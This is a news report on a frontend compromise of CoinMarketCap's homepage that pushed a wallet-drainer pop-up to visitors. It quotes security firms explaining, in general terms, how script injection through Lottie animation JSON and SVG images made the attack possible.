76 wallets drained in CoinMarketCap frontend exploit
Crypto cybersecurity firm Coinspect Security said it was able to recreate the JavaScript injection vulnerability that facilitated the CMC wallet drainer attack via an exploit in Lottie animation JSON files
A security flaw on CoinMarketCap’s website let an attacker briefly add a malicious pop-up onto the homepage that resulted in victims losing thousands of dollars.
The MetaMask team warned users on Friday evening against connecting their wallets to CoinMarketCap’s website because the coin tracker’s frontend had been compromised to push a wallet drainer scam.
About an hour later, CoinMarketCap confirmed that visitors to its site should not connect their wallets when prompted.
Later that evening, CMC explained that a vulnerability in a “doodle image” on its homepage “contained a link that triggered malicious code through an API call, resulting in an unexpected pop-up for some users.”
Crypto cybersecurity firm Coinspect Security said it was able to recreate the JavaScript injection vulnerability that facilitated the CMC wallet drainer attack via an exploit in Lottie animation JSON files.
Three cybersecurity experts from other firms separately confirmed to me over the weekend that Coinspect’s assessment of the incident is accurate.
Trey Blalock, founder of cybersecurity firm Verification Labs, told me he was able to retrieve copies of CoinMarketCap’s source code using the Internet Archive’s Wayback Machine to examine the incident.
“What is immediately noticeable is the heavy use of Scalable Vector Graphic (.SVG) images,” Blalock said of CMC’s site. “SVG is an excellent format for creating performant websites that look great across various display sizes, but recent security vulnerabilities have allowed attackers to embed HTML script tags inside SVG images that contain URLs to an attacker-controlled website, enabling them to execute a form of cross-site scripting.”
